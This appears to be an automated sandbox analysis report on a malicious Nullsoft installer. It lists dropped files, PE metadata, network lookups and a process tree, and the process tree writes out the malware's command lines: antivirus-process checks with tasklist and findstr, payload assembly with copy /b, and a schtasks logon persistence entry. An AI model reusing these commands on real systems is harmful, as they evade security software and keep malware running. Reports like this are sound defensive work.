                                            Preview:.a.r.i.e.s.../.".S.t.r.u.c.t.". .s.t.a.t.e.m.e.n.t. .h.a.s. .n.o. .m.a.t.c.h.i.n.g. .".E.n.d.S.t.r.u.c.t."...H.U.n.a.b.l.e. .t.o. .o.p.e.n. .f.i.l.e.,. .t.h.e. .m.a.x.i.m.u.m. .n.u.m.b.e.r. .o.f. .o.p.e.n. .f.i.l.e.s. .h.a.s. .b.e.e.n. .e.x.c.e.e.d.e.d...K.".C.o.n.t.i.n.u.e.L.o.o.p.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".W.h.i.l.e.".,. .".D.o.". .o.r. .".F.o.r.". .s.t.a.t.e.m.e.n.t...0.I.n.c.o.r.r.e.c.t. .n.u.m.b.e.r. .o.f. .p.a.r.a.m.e.t.e.r.s. .i.n. .f.u.n.c.t.i.o.n. .c.a.l.l...'.".R.e.D.i.m.". .u.s.e.d. .w.i.t.h.o.u.t. .a.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e...>.I.l.l.e.g.a.l. .t.e.x.t. .a.t. .t.h.e. .e.n.d. .o.f. .s.t.a.t.e.m.e.n.t. .(.o.n.e. .s.t.a.t.e.m.e.n.t. .p.e.r. .l.i.n.e.)...1.".I.f.". .s.t.a.t.e.m.e.n.t. .h.a.s. .n.o. .m.a.t.c.h.i.n.g. .".E.n.d.I.f.". .s.t.a.t.e.m.e.n.t...1.".E.l.s.e.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".I.f.". .s.t.a.t.e.m.e.n.t...2.".E.n.d.I.f.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".I.f.". .s.t.a.t
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):6.428731813042913
                                            Encrypted:false
                                            SSDEEP:192:ZzipamOEoh8uI5HIpmKaS7HXj8S0NOWpmqoVezg5IIvkFFAXsJEdNmTl4FzgG9:wYaPuMHIpmikS0NOsHuezu1sJM1zB
                                            MD5:373985375BDB5C1DAEEFC39AE0937FA1
                                            SHA1:E2EF52BAAA03535B0E2581A301108310C74BDDCE
                                            SHA-256:2E9DD9DC42674125BF79455D4FF86C1223A36DD2BB066461E5C930EFB98B63BF
                                            SHA-512:E914A3FA20DBA64DE594650CB4DAC4C4E481993049C6C495034FBAB29D86BF612E2B68AA50762EB334027B7FF1A59994AC63695256D67119C5CE0821F7FBE201
                                            Malicious:false
                                            Preview:...<:L.......@:L.......D:L....H:L..)I...T:L.'RH...X:L.......\:L.......`:L.......d:L.......h:L....l:L..)I...x:L..RH...|:L........:L........:L........:L........:L.....:L..)I....:L..SH....:L........:L........:L........:L........:L.....:L..)I....:L.mTH....:L........:L........:L........:L........:L.....:L..*I....:L.WUH....:L........:L........:L........:L........:L.....:L.$*I....;L..UH....;L........;L........;L........;L........;L.... ;L.8*I...,;L..VH...0;L.......4;L.......8;L.......<;L.......@;L....D;L.T*I...P;L.{WH...T;L.......X;L.......\;L.......`;L.......d;L....h;L.l*I...t;L.&XH...x;L.......|;L........;L........;L........;L.....;L..*I....;L..XH....;L........;L........;L........;L........;L.....;L..*I....;L.6YH....;L........;L........;L........;L........;L.....;L..*I....;L..YH....;L........;L........;L........;L........;L.....;L..*I....<L..[H....<L........<L........<L........<L........<L.....<L..*I...(<L.i]H...,<L.......0<L.......4<L.......8<L.......<<L....@<L..+I...L<L..]H...P<L.......T<
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):67584
                                            Entropy (8bit):6.5305894484434015
                                            Encrypted:false
                                            SSDEEP:1536:tQ1/9klkp5VLGEDuaiC7v8xV96AE11yHxpfYAz7FbkdHIx1d:S1/Qkp5IKuLuv8xVTOAxpg6pbsHY1d
                                            MD5:6B5D1DCA30A9179B5ABCAA23E9CF7157
                                            SHA1:644BBDBB17DDBB7D71C508EB98549321AB0E166F
                                            SHA-256:5931320AA39B9F4017914561C27F24C5E4927826D1270F250160C1BDF26E3AA5
                                            SHA-512:95F57E0EF34F8962F8CA5ACC60E1C933B52A2807FC9EB5907D5196849BB6CE771261FE037DDA53F505125196AE18493E1D9C78486D205E800AFF300497447CCE
                                            Malicious:false
                                            Preview:..u..E.P.M......~..u...j..A\...u.M..Y...E...P.E.PV.b....M.....\...M.......K.u.M..|Y...E...P.E.P.E.PV.u........M......[....t.......u..u..E...P........M..[...M.....M......._^[..]...U...L.U.VW.}..R..M.jH.....^.u....f9p..u.u..D......@.Pjp.............u..M..X....73.}...E.G........@.f;E.u.B..f;E.u.J..j@_f;.}.u...t...x.F..}..E.VPW.E.M.M.M.P.E...........y.....Q......U.j@^...f9p.u.I.....jGX...L..P..t...u.....}...E.uQf.E.M.3.j.f.E...s...M.......M.E.E.P..........u..E..WPj..O....M.E..d....V....}..uP...M.j4....s.....E.4..E.P.M....P...(s...M...Z...u..E.P.u..E..WPj..o.........}.........M..o....M...E..A..E..A..E..A..M..E....W...u..u...|.I....rL..u....P..E...~L....M.f.E.3.j.f.E...r...E..M.E.E.P..........u..E..WPj..S....M.E..h....U.M......u.........t?...M.j4....r...M.......M..u....#r...E...P.u..E.WPj..u....E..M...Y...E...yl.U.3..j....Zf9P.t1.....E.....@.f;E.u.A..f;E.u.I..~.j.Zf;.u....B.....3.Wh.....H..........Wh....H....8....3..M.....M...q...._^..]...U..V
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):49152
                                            Entropy (8bit):6.463566611894195
                                            Encrypted:false
                                            SSDEEP:768:R6Yk4iARefFilP4Bwh1QwTMvcVPDqdU7SIc/jnsRf4rJsb25v0hL4G+CAiwo8Z8N:jpAfkF/bIQ2dU7SP/jnsF4rJsx9RZqen
                                            MD5:FF117EE701CD0CC70F5AA5EE105E7FC2
                                            SHA1:14C5AE8946A164DB95FA6F5D5C9056CAFD3BC00E
                                            SHA-256:826254D57A974632F6D4FBE15143428E1E8B2C994B2713D2574B8521020CB4CC
                                            SHA-512:B3877F279FE564331AC3ADBB0243849C2E273A907C0811F21242386C56DFEDD2337D7346009B8653C65C587BCCCB086497F27661794804661F5DB16AFE871F6F
                                            Malicious:false
                                            Preview:......Q..........E..t .M..t....QPV.........u..........u..;v..f..0..cv..j..d.........t........H..J..H..J..@..B.....3...Fv.......G..F..7v...3........s.........v...}.....v...}.............v...M.B..E............E.P.E.PV.:`.......w...V..M....f.x..uJ.8.uE.D..f.x..u..]......v.....U..v...U..H.......F........@.Pjr.W....>w...U..H.......F........@.Ph...../.....w...M.j.jv.......w....`....E.P.[....e......v....@..M.Ph.........ps......D.R.@.R.@...D.R.@...D...D...D.. D.. D.. D..A..P0..x....`....y0..t.Q.M....`....e.....:x...e.....nx...u...R.E....w...u.Q...*....w....\.........H..E....sw....\....y....cw...u...R.....Sw...u..E...PR......?w..j..E...PR....,w..j..E...PR.....w..j..E...PR..c....w..j..E...PR.$.....v...z..v..G.f9H.u%.8 u ......D.....0..0...H..E.A...v..j.ji.......v...E...PR.....v....h....^....v..j.h.......R....{v...u..E.j.P.E..PS../...K..E...f.x....k|....@...Pjr......X|....rL..p..iy......DtL..@tL......h..C........._y......sz.......y...y......DtL..@tL......h..C..U.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):7168
                                            Entropy (8bit):5.696145415110408
                                            Encrypted:false
                                            SSDEEP:192:rhFGUS99p27x5yAMOUorM0pYPtlernjuPzQ0nMi49:rhFTqU7x5MOUyM0pNDj21na9
                                            MD5:F2D4E68D23921408E8C54C8035114F8F
                                            SHA1:5E4CA9AFDD5FDBAF7B6776BF29FDA61F45D015AB
                                            SHA-256:90E63DA6B9ADC3FE85ADE996E6E7E9A85496377E99B68B94AC779A376C1754D9
                                            SHA-512:2EED0CD7FB7C83E8340032E1B324AFC1C4D685F547A270344C2E295F3634CBE0D7E7282B20ABA5BF7BE21AA3502CC44C284BB7A0F0D3C5CB442D622FD8352964
                                            Malicious:false
                                            Preview:.................................................................~...p...........*...:...H...f...Z...N...D...T...`...l...x...............8...,... ...........................................................................................2...<...L...^...n...|.......................................*...@...T...b...v.......................................*...<...H...:...r.......................................(...8...H...Z...p.......................................,...B...T...f...x............................... ...>...`...z...............................(...:...P...`...l...........................................,...8...L...d...z.......................&...............................x...`...t...f.......R...................................2...D...N...Z...f...v.......................................$...4...F...R...b...|.......................^...................0..........................&...'...........%...)....... .......M................................................................
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):176128
                                            Entropy (8bit):7.998889553327324
                                            Encrypted:true
                                            SSDEEP:3072:YznTb9/1w+b5mt4Y9H18V8X9eL54mQz6JpLpae/5piyoe5W:AjBb5mtZ186XMLimQu9aK55W
                                            MD5:C51B4BD93615040665B5A2FD0EE12A2B
                                            SHA1:B88E06D7B5EC2710669AF73F4BEF2789241C1B88
                                            SHA-256:890299C53891428A3AE23628CBA0E711E5C408F40A9DF4AD6C06CA882FFFD453
                                            SHA-512:2DD7A51BCA31BCAF30C07EBEAAA2A7F798843C3B149C1676696991CCB43828BDFD89E5CF4B2514B43EA8BE5AB051125B78B05A5D124FAA5BDA75EE7B2321097D
                                            Malicious:true
                                            Preview:,....... ...s=.p...9.f.s...Z..ct..&......h8....R..e..1ILa9...pp'%....N.S......2.j....C....N.7y.........>...'f..;.v~.....}.W......6g..o...HZ.@8.^qFX..nn..,..f...CV.k.7.f....Z.....Am....Y.4..Z...RT.q...E...I.^....~.dQP.2wG.7HG....f,..].iz.....9..>!.nS.8Ly.szVp.4...1..w.....k+.)Pp.r.)..42Ykn.[..F...g&ZXo.b.{......-..[.. ./..D8A..^..q...o..Sj.].B:...es&.B..9.....T...e.8.?.Z.[W../.j...@.....e"..H....Z..%...E..?!.e..x...{..G......w..>H3..2Y..3.~,.c C-&9.......4Z%...".-..?. ..q;.i....,-'D.3.`u..Bt.Q..5Z'..=...G..WK....E&?....nR.,........r.kwF<x..h=...3f..+..w.......u;.......'.^ j..l~.?.x...0.....e.qU.i.L.}e.....t...'.9b.g....zh.Y-PV......4b*>.abR....%S..K..#Z....u....[n].b....i..Q.>...,e.U{.T8o....U.r..G..z]....L.......m.h.<.>XT....*m..*|.I..*.1W.........uj .&.F!...X9....~.....3.}.e.~!.`....j...Q....s..f....k..(......).k;^X.b.-.6.B....w....?..0.QP~...5......y..i..p...j.AC{M.k.x.......&.y.:...{...<i.....".)./..t...V......O.}]...K......y...
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2851237
                                            Entropy (8bit):7.7670046225977964
                                            Encrypted:false
                                            SSDEEP:49152:fU/L21jiKzl/uottM3ozttK2HmwNMPgM6Oua4EP2FjIdPbSdoHei8KMzL:fUz212KzPtx3XHVsFdPJd1eixMzL
                                            MD5:34F6EF5FF4355B400EFEBFD0E367A1C6
                                            SHA1:948D80525D510FA654B3B418866B140A5084180E
                                            SHA-256:C357A25B576D7400187755EB828673F86358DA31B51793D30C568D3DFF603AFB
                                            SHA-512:57842B27497E3FC1C5C808EF6312706AB1E74F8E359398354B476AA5037997622E24915984ECCE5F680B435692AF2E850906C4DF70FE32496BD9F30D7C42F544
                                            Malicious:false
                                            Preview:<4......,.......,.......D........#.......3......<4......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.996343811013664
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:file.exe
                                            File size:2'418'898 bytes
                                            MD5:814ff8b10d8641b03fcf1e9efc1005bf
                                            SHA1:25cb52ef822cf0077a11278d936569ed5f5d92d4
                                            SHA256:976137409e5d45839870a834b4b06bd46495a39d216bb0f31f1f0370fe1b5d94
                                            SHA512:4426e9d8f799cdd7b05fa7c40a4bb62d0b95e95a280d85dd7aaf808aabdd4752fd2621e6d073cd881c0176ef2b72a270a79d9a45f18da357d75c1e7dc084bc12
                                            SSDEEP:49152:Qg2wVptJl9PSgu4zNdH4aZI1vq/j0gBVI2azDaKIk5sJd8FB7TVysFP:NXd9P+4ZdHjIS0gBSDXInr8L7xFP
                                            TLSH:6AB5334E02E326B6EE5302326D240F167BC99F132077F70ED753368A605A997617E399
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....
                                            Icon Hash:60e098b8b892b2b0
                                            Entrypoint:0x4035d8
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x60FC91EE [Sat Jul 24 22:19:26 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A230h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080C8h]
                                            call dword ptr [004080CCh]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [0042A26Ch], eax
                                            je 00007F7E0CB12DC3h
                                            push ebx
                                            call 00007F7E0CB160C9h
                                            cmp eax, ebx
                                            je 00007F7E0CB12DB9h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007F7E0CB16043h
                                            push esi
                                            call dword ptr [00408154h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007F7E0CB12D9Ch
                                            push 0000000Bh
                                            call 00007F7E0CB1609Ch
                                            push 00000009h
                                            call 00007F7E0CB16095h
                                            push 00000007h
                                            mov dword ptr [0042A264h], eax
                                            call 00007F7E0CB16089h
                                            cmp eax, ebx
                                            je 00007F7E0CB12DC1h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007F7E0CB12DB9h
                                            or byte ptr [0042A26Fh], 00000040h
                                            push ebp
                                            call dword ptr [00408038h]
                                            push ebx
                                            call dword ptr [00408298h]
                                            mov dword ptr [0042A338h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 00421708h
                                            call dword ptr [0040818Ch]
                                            push 0040A384h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x4e88.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x65720x6600869e1d11bbf88d92521c022fa6f3d4f0False0.6623008578431373data6.453919385955138IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x13980x140079e286249499b713a2ddbee33baa50daFalse0.449609375data5.1367175827370986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x203780x600b6d02c867f7bfbcf68de2cfeea94fd73False0.5078125data4.096809083627214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x2b0000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x3b0000x4e880x5000d532dfd53e9ce17a7f111164b80425d7False0.6568359375data6.503943451432764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x3b1f00x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.4458909682668836
                                            RT_ICON0x3d8580x1bd2PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0015445099691098
                                            RT_ICON0x3f4300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6968085106382979
                                            RT_DIALOG0x3f8980x100dataEnglishUnited States0.5234375
                                            RT_DIALOG0x3f9980x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x3fab80x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x3fb180x30dataEnglishUnited States0.875
                                            RT_MANIFEST0x3fb480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                            DLLImport
                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jun 17, 2024 17:58:06.806751966 CEST5808653192.168.2.41.1.1.1
                                            Jun 17, 2024 17:58:06.823071003 CEST53580861.1.1.1192.168.2.4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jun 17, 2024 17:58:06.806751966 CEST192.168.2.41.1.1.10xdad3Standard query (0)JzyWtlVaDZyw.JzyWtlVaDZywA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jun 17, 2024 17:58:06.823071003 CEST1.1.1.1192.168.2.40xdad3Name error (3)JzyWtlVaDZyw.JzyWtlVaDZywnonenoneA (IP address)IN (0x0001)false

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:11:58:00
                                            Start date:17/06/2024
                                            Path:C:\Users\user\Desktop\file.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                            Imagebase:0x400000
                                            File size:2'418'898 bytes
                                            MD5 hash:814FF8B10D8641B03FCF1E9EFC1005BF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:11:58:01
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:11:58:01
                                            Start date:17/06/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:11:58:03
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0x440000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:4
                                            Start time:11:58:03
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "wrsa.exe opssvc.exe"
                                            Imagebase:0xb40000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:5
                                            Start time:11:58:04
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0x440000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:11:58:04
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                            Imagebase:0xb40000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:7
                                            Start time:11:58:04
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c md 812297
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:11:58:04
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /V "IndieBeachesHonIo" Janet
                                            Imagebase:0x30000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:9
                                            Start time:11:58:04
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:11:58:04
                                            Start date:17/06/2024
                                            Path:C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif
                                            Wow64 process (32bit):true
                                            Commandline:812297\Shopzilla.pif 812297\g
                                            Imagebase:0xba0000
                                            File size:937'776 bytes
                                            MD5 hash:B06E67F9767E5023892D9698703AD098
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:11
                                            Start time:11:58:05
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout 15
                                            Imagebase:0x920000
                                            File size:25'088 bytes
                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:11:58:05
                                            Start date:17/06/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
                                            Imagebase:0x400000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:11:58:06
                                            Start date:17/06/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

